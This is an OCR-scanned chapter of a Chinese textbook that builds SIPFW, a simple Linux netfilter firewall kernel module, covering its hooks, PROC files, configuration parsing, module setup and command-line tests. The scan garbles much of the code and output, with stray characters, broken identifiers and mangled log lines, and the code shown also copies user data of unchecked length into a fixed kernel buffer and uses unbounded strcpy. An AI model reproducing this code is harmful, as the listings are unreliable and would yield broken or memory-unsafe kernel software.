static struct nf hook ops sipfw hooks[] = { /* 钩子 挂 接 结构 */ 
i 


“666。 


.hook 
.Owner 
pt 
.hooknum 
-priority 


.hooknum 
“Priority 
}, 
jy 
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= SIPFW HookLocalIn, 
= THIS MODULE, 

= PF_INET, 

= NF_IP_LOCAL IN, 

= NF_IP PRI FILTER-1, 


= SIPFW HookLocaOut, 
= THIS MODULE, 

= PF_INET, 

= NF_IP_LOCAL OUT, 

= NF_IP PRI FILTER-1, 


-个 简单 防火 墙 的 例子 SIPFW 


/* 本 地 接收 数据 */ 
/* 模 块 所 有 者 */ 
/* 网 络 协议 */ 

/* 挂 接点 */ 

/* 优 先 级 */ 


/* 本 地 发 出 的 数据 */ 
/* 模 块 所 有 者 */ 

/* 网 络 协议 */ 
/* 挂 接点 */ 
/* 优 先 级 */ 


进入 本 地 的 网 络 数据 处 理 过 程 主 要 进行 规则 的 匹配 性 计算 ， 如 果 找 到 匹配 项 ， 则 返回 
匹配 项 的 处 理 规则 , 由 netfilter 架构 进行 处 理 。 匹 配 的 计算 过 程 调用 前 面 的 SIPFW_IsMatch() 
函数 ， 将 网 络 数据 指针 和 “SIPFFW_CHAIN_INPUT 链 的 指针 传 入 ， 让 函数 在 此 链 上 进行 查 
找 。 在 匹配 计算 之 前 对 全 局 变量 cf 的 成 员 invalid 进行 判断 ， 是 否 禁止 了 防火 墙 ， 如 果 禁 
止 了 防火 墙 ， 就 不 进行 规则 判定 ， 直 接 按照 事先 的 默认 规则 对 网 络 数据 进行 处 理 。 

本 地 发 出 网 络 数据 的 钓 子 处 理 函 数 SIPFW_HookLocaOut() 的 过 程 与 SIPFW_ 
HookLocalIn() 函 数 一 致 ， 只 不 过 将 匹配 的 链 改 为 了 SIPFW_CHAIN_OUTPUT。 


static unsigned int 

SIPFW HookLocalIn (unsigned int hook， 
struct sk buff **pskb, 
Const struct net device *in, 
const struct net device *out, 
int (*okfn) (struct sk buff *) ) 


struct sipfw rules *1 = NULL; 
struct sk buff *skb = *pskb; 
struct sipfw rules *found = NULL; 
int retval = 0; 


if(cf.Invalid) 
{ 


retval = NF ACCEPT; 
goto EXITSIPFW HookLocalIn; 


1 = sipfw tables[SIPFW CHAIN INPUT] .rule; 
found = SIPFW _ . 


if (found) 
{ 


IsMatch (skb, 1); 


SIPFW LogAppend(skb, found); 
cf.HitNumber++; 


/#* 进 入 本 地 数据 的 钩子 处 理 函数 */ 


/* 规 则 链 指 针 */ 

/* 网 络 数据 结构 */ 
/* 找 到 的 规则 */ 
/* 返 回 值 */ 

/#* 防 火 墙 是 否 禁止 */ 


/* 防 火 墙 关闭 , 让 数据 通过 */ 


/*INPUT 链 */ 
/* 数 据 和 链 中 规则 是 否 匹 配 */ 
/* 有 匹配 规则 */ 


/* 记 录 */ 
/* 命 中 数 增加 */ 


retval = found?found->action:cf.DefaultAction; /# 更 新 返回 值 */ 
EXITSIPFW HookLocalIn: 


return retval 
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20.7.4 ”SIPFW 防火 墙 的 PROC 虚拟 文件 系统 


SIPFW 防火 墙 支持 PROC 虚拟 文件 系统 , 可 以 通过 对 虚拟 文件 的 操作 来 实现 防火 墙 信 
息 的 读 取 和 对 防火 墙 进行 简单 的 配置 工作 。 SIPFW 的 虚拟 文件 系统 在 目录 “/proc/net/sipfw” 
下 建立 了 4 个 文件 : information 、defaultaction 、logpase 和 invalid， 分 别 用 于 描述 系统 的 信 
息 、 默 认 动作 、 日 志 记 录 的 中 止 设 置 、 防 火 墙 失效 性 设置 ， 后 面 3 个 是 可 以 修改 的 。 


1. 


PROC 文件 的 建立 


PROC 虚拟 文件 系统 的 初始 化 先 调用 函数 proc_mkdir() 在 proc_net 设 定 的 目录 下 建立 
sipfw 目录 ， 即 /proc/net/sipfw 目录 。 然 后 调用 函数 create_proc_entry() 分 别 在 sipfw 下 建立 
虚拟 文件 information、defaultaction、logpause 和 invalid， 并 挂 接 不 同 的 读 写 回调 函数 。 


/*PROC 虚拟 文件 初始 化 函数 */ 
int SIPFW Proc Init( void ) 


出 
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int ret = 0; 
/* 申 请 内 存 保 存 用 户 写 入 的 数据 */ 
Cookie_Pot = (char *)vmalloc( MAX COOKIE LENGTH ) 7 
if (!cookie pot) /* 申 请 失败 */ 
{ 
ret = -ENOMEM; 
} 
else 
{ 
memset ( cookie pot, 0, MAX COOKIE LENGTH ); /* 清 零 缓冲 区 */ 
Sipfw proc dir = proc mkdir("sipfw", 
/* 在 /proc/net 下 建立 sipfw 目录 */ 
proc net); 
sipfw proc info = create proc entry( "information", /* 信 息 项 */ 
0644, sipfw proc dir ); 
Sipfw proc defaultaction = create proc entry( "defaultaction", 
/* 默 认 动 作 项 */ 
0644, sipfw proc dir ); 
sipfw_proc logpause = create proc entry( "logpause", /* 日 志 中 止 项 x/ 
0644, sipfw proc dir ); 
sipfw_proc_invalid= create proc entry( "invalid"，/* 防 火 墙 中 止 项 */ 
0644, sipfw proc dir ); 


if (sipfw proc info == NULL /* 判 断 是 否 建立 成 功 */ 
11| sipfw proc defaultaction == NULL 
|11sipfw proc logpause == NULL 
Ilsipfw proc invalid == NULL) 

{ /* 进 行 恢复 工作 */ 


ret = -ENOMEM; 
vfree (cookie pot); 
} 
else 
{ 
Sipfw proc info->read proc = SIPFW ProcInfoRead; /* 信 息 读 函数 */ 
sipfw proc info->owner = THIS MODULE; 
Sipfw proc defaultaction->read proc ; /* 动 作 读 函数 */ 


第 20 章 一 个 简单 防火 墙 的 例子 SIPFW 


= SIPFW ProcActionRead 
Sipfw proc defaultaction->write proc /* 动 作 写 函数 */ 
= SIPFW ProcActionWrite; 
Sipfw proc defaultaction->owner = THIS MODULE; 
sipfw proc logpause->read proc = SIPFW ProcLogRead; 
/* 日 志 读 函数 */ 
Sipfw proc logpause->write proc= SIPFW ProcLogWrite; 
/* 日 志 写 函数 */ 
Sipfw_ proc logpause->owner = THIS MODULE; 
Sipfw proc invalid->read proc = SIPFW ProcInvalidRead; 
/* 防 火 墙 读 函 数 */ 
Sipfw proc invalid->write proc= SIPFW ProcInvalidWrite; 
/* 防 火 墙 写 函数 */ 
sipfw proc invalid->owner = THIS MODULE; 
} 
1 


return ret; 


2. PROC 文件 的 销毁 


PROC 虚拟 文件 系统 的 销毁 是 初始 化 的 逆 过 程 ， 调 用 函数 remove_proc_entry(0) 销 毁 初 
始 化 建立 的 虚拟 文件 ， 释 放 的 时 候 要 先 释 放 目录 下 的 文件 ， 然 后 释放 目录 。 下 面 的 代码 中 
还 对 之 前 申请 的 内 存 进行 了 释放 。 


/*PROC 虚拟 文件 清理 函数 */ 
void SIPFW Proc CleanUp( void ) 
{ 
remove proc entry("defaultaction", sipfw proc dir); 

/* 释 放 文 件 defaultaction*/ 
remove_proc entry("logpause"，sipfw_proc dir); /* 释 放 文 件 logpause*/ 
remove_proc entry("invalid"，sipfw proc dir); /* 释 放 文 件 invalid*/ 
remove_ proc entry("information", sipfw proc dir); 


/* 释 放 文 件 information*/ 
remove_proc entry("sipfw"，proc_net);  /* 释 放 目录 sipfw*/ 
vfree (cookie pot); /* 释 放 之 前 申请 的 内 存 */ 


3. PROC 文件 的 读 操作 


对 虚拟 文件 系统 的 读 写 函数 的 实现 是 虚拟 文件 的 关键 ， 例 如 对 系统 日 志文 件 的 中 止 设 
置 的 读 函 数 如 下 所 示 ， 当 用 户 空 间 对 虚拟 文件 /proc/net/sipfw/logpause 进行 读 操作 的 时 候 ， 
会 调用 此 函数 ， 此 函数 将 全 局 变量 cf 的 LogPause 成 员 值 复 制 给 用 户 。 


int SIPFW ProcLogRead( char *buffer, char **start, off t offset, int length, 
int *eof, void *data ){ 


int len; 
i (OFFset > O04 
*eof = 1; 


return 0; 


} 
/* 将 日 志 写 入 中 止 的 设置 给 用 户 */ 
len = sprintf (buffer, "%d\n",cf.LogPause); 
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return len; 


4. PROC 文件 的 写 操作 


对 系统 日 志文 件 的 中 止 设 置 的 写 函数 如 下 ， 当 用 户 空间 对 虚拟 文件 “/proc/netsipfw/ 
logpause” 进 行 写 操作 的 时 候 ， 会 调用 此 函数 ， 此 函数 将 用 户 的 输入 复制 进 缓冲 区 后 ， 将 
值 使 用 sscanfO) 函 数 放 到 全 局 变量 cf 的 LogPause 成 员 中 。 

ssize t SIPFW ProcLogWrite( struct file *filp, const char _ user *buff, 

unsigned long len, void *data ){ 

/* 将 数据 复制 入 缓冲 区 */ 


if (copY_from_user( cookie pot, buff, len )) { 
return -EFAULT; 


} 

/* 格 式 获 取 输 入 值 */ 

sscanf (buff,"%d\n", &cf.LogPause); 
return len; 


20.7.5 ”SIPFW 防火 墙 对 配置 文件 的 解析 


SIPFW 的 一 些 参数 可 以 通过 配置 参数 进行 配置 ， 例 如 ， 防 火 墙 在 没有 规则 命中 时 的 默 
认 动 作 、 日 志文 件 的 路 径 等。 对 配置 文件 的 解析 是 在 之 前 文件 操作 的 基础 上 对 文件 的 数据 
按 行 进行 读 入 ， 然 后 与 关键 的 字符 串 进行 比较 ， 获 得 上 述 的 配置 情况 。 

配置 文件 的 配置 参数 会 更 新 全 局 变量 cf 的 参数 ， 更 新 系统 的 设置 。 


/* 从 配置 文件 中 读 取 配 置信 息 */ 
int SIPFW HandleConf (void) 
{ 
int retval = 0,count; 
char *pos = NULL; 
struct file *f = NULL; 
char line[256]; 
DBGPRINT ("==>SIPFW HandleConf\n"); 
f = SIPFW OpenFile("/etc/sipfw.conf", /* 打 开 文件 "/etc/sipfw.conf"*/ 
O CREAT|O RDWRIO APPEND, 0); 
if(£ == NULL) { /* 失 败 */ 
retval = -1; 
goto EXITSIPFW HandleConf; 
while((count = SIPFW ReadLine(f, line, 256))>0) { /* 读 取 一 行 */ 


pos = line; /* 数 据 头 */ 
if(!strncmp (Pos， "DefaultAction",13)) { /* 默 认 动作 ?*/ 
pos += 13+1; /* 更 改 位 置 */ 
if(!strncmp (pos, "ACCEPT", 6)) /* 是 否 ACCEPT*/ 
cf.DefaultAction = SIPFW ACTION ACCEPT; 
else if(!strncmp (pos, "DROP",4)) /* 是 否 DROP*/ 
cf.DefaultAction = SIPFW ACTION DROP; 
和 
else if(!strncmp(pos, "RulesFile",9)) { /* 规 则 文件 路 径 */ 
pos += 10; 
strcpy (cf.RuleFilePath, pos); /* 复 制 */ 
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else if(!strncmp(pos, "LogFile",7)) { /* 日 志文 件 路 径 */ 
pos += 8; 
strcpy (cf.LogFilePath,pos ); /* 复 制 */ 
} 
上 
SIPFW CloseFile(f) /* 关 闭 文件 */ 


EXITSIPFW HandleConf: 
DBGPRINT ("<==SIPFW HandleConf\n"); 
return retval; 


20.7.6 SIPFW 防火 墙 内 核 模块 初始 化 和 退出 
内 核 模块 的 初始 化 是 内 核 模块 编程 的 基本 部 分 。 
1， 内 核 模块 初始 化 函数 


SIPFW 的 内 核 模块 初始 化 部 分 主要 进行 了 如 下 工作 :通过 SIPFW_HandleConfO 函 数 来 


读 取 配置 文件 的 参数 配置 ， 通过 SIPFW_NLCreate0) 函 数 进 行 NL 的 建立 ; 通过 SIPFW_ 


Proc_Init() 函 数 进行 PROC 虚拟 文件 系统 的 建立 ; 通过 nf register_ hooks() 函 数 挂 载 netfilter 


的 钩子 函数 。 
/* 模 块 初始 化 */ 


static int init SIPFW Init(void) 
{ 

int ret = -1; 

DBGPRINT ("==>SIPFW Init\n"); 


ret = SIPFW HandleConf (); /* 读 取 防 火 墙 配置 文件 */ 
ret =SIPFW NLCreate(); /* 建 立 Netlink 套 接 字 准备 和 用 户 空间 通信 */ 
二] 


goto errorl; 


上 


ret =SIPFW Proc Init(); /* 建 立 PROC 虚拟 文件 */ 
if(ret) { 
goto error2; 
} 
ret = nf register hooks (sipfw hooks,ARRAY SIZE(sipfw hooks)); 
EC) 
goto error3; 
} 
goto errorl; 
error3: 
SIPFW Proc CleanUp(); /* 回 复 步 又 3*/ 
error2: /* 回 复 步骤 2*/ 
SIPFW NLDestory() 
errorl: /* 回 复 步骤 1*/ 
DBGPRINT ("<==SIPFW Init\n"); 
return ret; 


2. 内 核 模块 的 退出 函数 
模块 退出 函数 是 模块 初始 化 函数 的 逆 操 作 ， 进 行 一 些 资源 的 释放 。 
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static void exit SIPFW Exit (void) 


DBGPRINT ("==>SIPFW Exit\n"); 


SIPFW NLDestory(); /* 释 放 NL 套 接 字 处 理 函 数 */ 
SIPFW ListDestroy(); /#* 释 放 规则 链表 内 存 */ 
SIPFW Proc CleanUp(); /* 销 毁 虚拟 文件 */ 
nf_unregister_hooks (sipfw hooks,ARRAY SIZE(sipfw hooks)); 

/* 取 消 钩子 函数 */ 


DBGPRINT ("<==SIPFW Exit\n"); 


20.7.7 ”用户 空间 处 理 主 函 数 


用 户 空间 的 主 程序 如 下 ， 先 将 用 户 输入 的 参数 进行 解析 ， 再 判断 解析 结果 的 合法 性 ， 
将 解析 结果 显示 出 来 。 然 后 将 解析 获得 的 结果 发 送 给 内 核 ， 并 等 待 内 核 的 响应 ， 当 为 规 
则 列表 命令 的 时 候 ， 内 核 先 发 送 列表 的 个 数 ， 用 户 空间 一 直 等 待 直 至 内 核 将 规则 全 部 发 送 


完毕 。 


int main(int argc, char *argv[]) 


‘ 
struct sipfw cmd opts cmd opt; 
SIPFW_ParseCommand (argc，argv &cmd opt) ; /* 解 析 命 令 格 式 */ 
if (SIPFW_ JudgeCommand (&cmd opt)) 
return -1; 
SIPFW DisplayOpts (&cmd opt); /* 显 示 解 析 结果 */ 
SIPFW NLCreate () /* 建 立 NetLink 套 接 字 */ 
size = SIPFW NLSend( (char*) &cmd opt, sizeof(cmd opt), SIPFW MSG PID); 
/* 发 送 命 令 */ 
if(size < 0){ /* 失 败 */ 
return -1; 
有 
size = SIPFW NLRecv(); /* 接 收 内 核 响应 */ 
if(size < 0){ /* 失 败 */ 
return 17 
1 
if(cmd opt.command.v_uint == SIPFW_CMD LIST) {/* 获 得 规则 列表 */ 
unsigned int count = 0; /* 规 则 列表 的 数据 量 */ 
itr(slze > ON 
count = message.payload.count; /* 规 则 个 数 */ 
} else 人 
return -1; 
} 
SIPEW NLRecvRuleList (count); /* 接 收 并 显示 规则 */ 
}else{ 
DBGPRINT ("information:%s\n",message.payload.info str); 
} 
SIPFW NLClose(); /* 关 闭 NetLink 套 接 字 */ 
} 
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20.8 编译、 调试 和 测试 


本 节 将 对 SIPFW 防火 墙 的 内 核 模块 和 应 用 端的 配置 程序 进行 编译 , 并 搭建 测试 环境 对 
SIPFW 防火 墙 的 规则 配置 、 网 络 数据 的 拦截 情况 进行 测试 , 通过 日 志文 件 查看 拦截 的 结果 。 
其 中 对 SIPFW 防火 墙 的 proc 虚拟 文件 系统 进行 查看 ， 并 通过 写 入 proc 的 文件 修改 防火 墙 


的 配置 。 
20.8.1 


用 户 程序 和 内 核 程序 的 Makefile 


内 核 程序 的 代码 分 为 列 在 如 下 的 文件 中 ， 内 核 文件 以 sipfw_k* 开 始 ， 其 中 的 头 文件 
sipfw.h 和 sipfw_parah 与 用 户 空间 的 程序 共用 ,使 用 宏 _KERNEL 进行 条 件 包 含 如 下 所 述 。 


口 


口 


口 


口 


口 


口 


口 


文件 sipfw.h: 为 内 核 处 理 的 头 文件 ， 主 要 的 数据 结构 和 函数 声明 。 
文件 sipfw_k.c: 包含 钧 子 函 数 、 模 块 程序 的 初始 化 和 退出 函数 。 
文件 sipfw_k_common.c: 为 模块 的 通用 处 理 函 数 ， 包 含 IP 匹配 、 附 加 项 匹配 、 日 
期 函数 的 实现 。 
文件 sipfw_k_file.c: 包含 内 核 文 件 读 写 的 实现 ， 配 置 文件 读 取 和 日 志文 件 的 写 入 
函数 也 放 在 这 个 文件 中 。 

文件 sipfw_k_nl.c: 这 个 文件 包含 了 与 用 户 的 通信 函数 ， 并 将 规则 链表 的 增加 、 删 
除 、 插 入 、 蔡 换 、 清 空 、 获 取 列 表 等 规则 链表 操作 函数 放 在 这 里 。 

文件 sipfw_k proc.c: 包含 SIPFW 的 虚拟 文件 系统 的 初始 化 、 销 毁 、 各 虚拟 文件 
的 读 写 函数 实现 。 

文件 sipfw_para.h: 这 是 一 个 全 局 函数 定义 的 头 文件 , 仅 在 文件 sipfw_k.c 中 进行 了 
包含 。 


内 核 文件 的 Makefile 代码 如 下 , 模块 的 名 称 为 sipfw_module.ko， 它 涵盖 上 述 所 有 的 内 
核 文件 (sipfw_module-objs 项 为 包含 的 文件 )。 


sipfw module-objs := sipfw k.o sipfw k file.o sipfw k Proc.o sipfw k nl.o 
sipfw k common.o 

obj-m := sipfw module.o 

#sipfw k file.o 

KERNELDIR = /lib/modules/ uname -r“/build 

default: 


$ (MAKE) -C $ (KERNELDIR) M=$ (PWD) modules 
rm -rf *.mod.c Module.symvers * .mod.o *.O .*.cmd .tmp versions 


install: 


insmod sipfw module.ko 


uninstall: 


rmmod sipfw module.ko 


clean: 


rm rE ONG 
rm -rf Module.symvers .*cmd .tmp_versions 


户 层 的 代码 仅 包含 sipfw_u.c， 其 头 文件 与 内 核 共用 ，Makefile 代码 如 下 ， 其 中 头 文 


件 在 内 核 的 目录 下 ， 所 以 使 用 了 “-I../module/” 项 。 


CFLAGS = -I../module/ 
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CC = gcc 
all’: 

$(CC) -o sipfw sipfw u.c $ (CFLAGS) 
clean: 

rm -f *+.O sipfw 


20.8.2 ”编译 及 运行 
对 上 述 两 个 程序 进行 编译 ， 分 别 生成 了 用 户 层 程序 sipfw 和 内 核 模 块 程序 sipfw_ 
module.ko， 加 载 内 核 模 块 sipfw_module.ko。 


#make install 


查看 SIPFW 的 虚拟 文件 系统 。 


# 1s /proc/net/sipfw/ -1 

total 0 

-rw-r--r-- 1 root root 0 2008-12-21 04:54 defaultaction  /# 默 认 动作 */ 
-rw-r--r-- 1 root root 0 2008-12-21 04:54 information /# 系 统 信息 */ 


-rw-r--r-- 1 root root 0 2008-12-21 04:54 invalid /* 防 火 寺 有效 信 息 */ 
-rw-r--r-- 1 root root 0 2008-12-21 04:54 logpause /* 日 志 中 止 项 */ 
查看 PROC 中 的 各 项 的 值 。 

# cat /proc/net/sipfw/defaultaction /* 查 看 默认 动作 项 的 值 */ 
ACCEPT /* 通 过 防火 墙 */ 

# cat /proc/net/sipfw/information /* 查 看 系统 信息 */ 
DefaultAction:ACCEPT /* 默 认 动 作 */ 
RulesFile:/etc/sipfw.rules /* 规 则 文件 路 径 为 "/etc/sipfw.rules" */ 
LogFile:/etc/sipfw.1og /* 日 志文 件 路 径 为 "/etc/sipfw.1log"*/ 
RulesNumber:0 /* 规 则 的 数量 */ 
HitNumber:0 /* 规 则 命中 情况 */ 
FireWall:VALID /* 防 火 增 有 效 性 为 有 效 */ 

# cat /proc/net/sipfw/invalid /* 查 看 防火 墙 无 效 性 配置 ，0 为 有 效 */ 

0 /* 防 火 墙 没有 失效 */ 

# cat /proc/net/sipfw/logpause /* 查 看 日 志 中 止 配置 */ 

0 /* 日 志 记录 没有 中 止 */ 


20.8.3 下 发 过 滤 规 则 ， 测 试 过 滤 结 果 


对 运行 的 SIPFW 防火 墙 进行 规则 设置 ， 测 试 结果 。 本 机 有 一 个 eth0 网 卡 IP 地 址 为 
192.168.1.151， 回 环 接 口 lo，IP 地 址 为 127.0.0.1， 它 安装 了 SIPFW 防火 墙 用 于 测试 ， 而 主 


机 A 的 人 * 地 址 为 192.168.1.150， 参 与 防火 墙 SIPFW 的 测试 ， 如 图 20.15 所 示 。 
安装 了 SIPFW 
主机 A 服务 器 B 
192.168.1.150 192.168.1.151 


以 太 网 


图 20.15 测试 SIPFW 的 拓扑 结构 
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(1) 先 设置 过 滤 规 则 ,然后 查看 规则 设置 情况 。 包 括 服务 器 B 本 地 的 过 滤 和 主机 A 对 
服务 器 B 进行 访问 时 的 测试 。 


# ./sipfw -A INPUT -s 127.0.0.1 -p icmp -j DROP 


/* 加 入 ICMP 丢弃 规则 */ 
information:SUCCESS /* 返 回 成 功 结果 */ 
#./sipfw -L /* 查 看 之 前 加 入 的 列表 */ 
CHAIN INPUT Rules /*INPUT 链 规则 */ 
ACTION SOURCE SPORT DEST DPORT ”PROTO /* 选 项 */ 

DROP 0.0.0.0 0 T2700 0 1 /* 选 项 值 */ 
#./sipfw -A INPUT -s 127.0.0.1 -p tcp --dport 80 -j DROP 

/* 增 加 TCP 的 80 端口 丢弃 */ 
information:SUCCESS /* 返 回 成 功 结果 */ 
#./sipfw -L /* 查 看 之 前 加 入 的 列表 */ 
CHAIN INPUT Rules /*INPUT 链 规则 */ 
ACTION SOURCE SPORT DEST DPORT ”PROTO /* 选 项 */ 

DROP 0.0.0.0 0 7 OROR 0 ll /* 选 项 值 */ 
DROP 0.0.0.0 0 T2700 80 6 /* 选 项 值 */ 


#./sipfw -A OUTPUT -s 192.168.151 -p icmp -j DROP 
/* 在 OUTPUT 链 加 入 ICMP 丢弃 规则 */ 


#./sipfw -L /* 查 看 之 前 加 入 的 列表 */ 
CHAIN INPUT Rules /*INPUT 链 规则 */ 
ACTION SOURCE SPORT DEST DPORT ”PROTO /* 选 项 */ 

DROP 0.0.0.0 0 T2700 0 和 /* 选 项 值 */ 

DROP 0.0.0.0 0 T2700 80 6 /* 选 项 值 */ 

CHAIN OUTPUT Rules /*OUTPUT 链 规则 */ 
ACTION SOURCE SPORT DEST DPORT ”PROTO /* 选 项 */ 

DROP 0.0.0.0 0 192.168.0.151 0 a /* 选 项 值 */ 


此 时 ， 在 本 地 回环 端口 上 定义 了 ICMP 的 丢弃 和 TCP 端口 80 的 丢弃 规则 。 
(2) 利用 ping 进行 防火 墙 设置 测试 。 
#ping 127.0.0.1 


PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. /*ping 127.0.0.1*/ 
--- 127.0.0.1 ping statistics --- /*ping 的 统计 结果 */ 
3 packets transmitted, 0 received, 100% packet loss, time 2000ms 

/*3 个 包 全 部 丢失 */ 


查看 日 志文 件 的 记录 情况 ， 可 以 看 到 3 个 数据 包 全 部 被 防火 墙 丢 弃 了 。 


# cat /etc/sipfw.1og 

Time: 2008-12-20 05:00:25 From 127.0.0.1 To 127.0.0.1 icmp PROTOCOL was 
DROPed 

Time: 2008-12-20 05:00:26 From 127.0.0.1 To 127.0.0.1 icmp PROTOCOL was 
DROPed 

Time: 2008-12-20 05:00:27 From 127.0.0.1 To 127.0.0.1 icmp PROTOCOL was 
DROPed 


查看 PROC 文件 系统 的 统计 信息 ， 规 则 的 数量 为 3 个 ， 进 行 了 3 次 防火 墙 网 络 数据 的 
调用 ， 与 实际 情况 一 致 。 


#cat /proc/net/sipfw/information 
DefaultAction:ACCEPT /* 默 认 动 作 */ 
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第 4 篇 综合 案例 
RulesFile:/etc/sipfw.rules /* 规 则 文件 路 径 #/ 
LogFile:/etc/sipfw.1og /* 日 志文 件 路 径 #/ 
RulesNumber:3 /* 规 则 数量 3 个 */ 
HitNumber:3 /* 防 火 墙 处 理 了 3 次 网 络 数据 */ 
FireWall:VALID /* 防 火 增 没有 失效 */ 


(3) 下 面 进 行 TCP 连接 的 测试 ， 启动 之 前 的 SHTTPD Web 服务 器 ， 从 客户 端 用 Telnet 
对 80 端口 进行 访问 ， 由 于 防火 墙 对 80 端口 进行 了 数据 丢弃 的 规则 设置 ， 应 该 不 能 正常 
访问 。 


/*telnet 127.0.0.1 的 80 端口 */ 
/* 不 能 访问 */ 
/* 查 看 日 志文 件 */ 


#telnet 127.0.0.1 80 
TEyine T2700 
# cat /etc/sipfw.1og 


Time: 2008-12-20 05:05:15 From 127.0.0.1 To 127.0.0.1 tcp PROTOCOL was 
DROPed 

Time: 2008-12-20 05:06:08 From 127.0.0.1 To 127.0.0.1 tcp PROTOCOL was 
DROPed 

# telnet 192.168.1.151 80 /*eth0 网 卡 的 telnet 测试 */ 
Trying 192.168.1.151... /* 不 能 通过 */ 

# cat /etc/sipfw.1og /* 查 看 日 志文 件 */ 


Time: 2008=12=20 05505315 From: 427.0.01 To 127500L top. PROTOGOL WaS 
DROPed 

Time: 2008-12-20 05:06:08 From 127.0.0.1 To 127.0.0.1 tcp PROTOCOL was 
DROPed 

Time: 2008-12-20 05:06:37 From192.168.1.151To192.168.1.151 tcp PROTOCOL 
was DROPed 


#cat /proc/net/sipfw/information 


DefaultAction:ACCEPT /* 上 默认 动作 */ 
RulesFile:/etc/sipfw.rules /* 规 则 文件 路 径 */ 
LogFile:/etc/sipfw.1og /* 日 志文 件 路 径 */ 
RulesNumber:3 /* 规 则 数量 3 个 */ 
HitNumber:14 /* 防 火 墙 处 理 了 14 次 网 络 数据 */ 
FireWall:VALID /* 防 火 墙 没有 失效 */ 


(4) 通过 PROC 虚拟 文件 系统 设置 防火 墙 失效 。 

下 面 为 测试 的 步骤 ， 先 设置 虚拟 文件 系统 的 “/proc/net/sipfw/invalid” 为 1， 使 得 防火 
墙 的 失效 生效 ， 此 时 防火 墙 的 默认 规则 为 ACCEPT， 网 络 数据 防火 墙 会 让 其 通过 ， 不 进行 
拦截 

# echo "1">/proc/net/sipfw/invalid  /* 设 置 防火 墙 失效 */ 

#telnet 192.168.1.151 80 /* 通 过 eth0 来 telnet 测试 80 端口 是 否 通行 */ 


Trying 192.168.1.151... /* 连 接 中 */ 
Connected to 192.168.1.151. /* 连 接 上 */ 
Escape character is '^]'. /* 脱 字符 */ 

20.9 小 结 


本 章 介绍 了 网 络 防 火 墙 的 设计 方法 。SIPFW 防火 墙 基本 可 以 实现 简单 的 网 络 数据 的 拦 
截 。SIPFW 防火 墙 的 功能 比较 齐全 ， 可 以 进行 网 络 数据 的 拦截 ， 可 以 通过 用 户 的 命令 进行 
防火 墙 的 设计 ， 可 以 将 防火 墙 的 命中 情况 进行 记录 、 可 以 通过 配置 文件 和 PROC 对 防火 墙 
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进行 简单 的 配置 等 。 


SIPFW 防火 墙 还 有 很 多 不 合理 的 地 方 , 例如 命令 行 的 解析 并 没有 进行 完全 的 容错 性 设 
内 核 规则 匹配 的 算法 不 够 高 效 、 内 核 没 有 进行 互 斥 设计 使 得 并 行 访问 十 分 危险 、 防 火 


墙 的 网 络 数据 过 滤 方 式 并 不 完全 等 。 


作为 一 个 内 核 和 用 户 空间 网 络 程序 设计 的 演示 程序 ， 在 其 框架 上 ， 读 者 可 以 进行 有 效 


的 扩展 和 改进 ， 使 得 它 的 稳定 性 和 性 能 ， 以 及 功能 更 加 完善 。 
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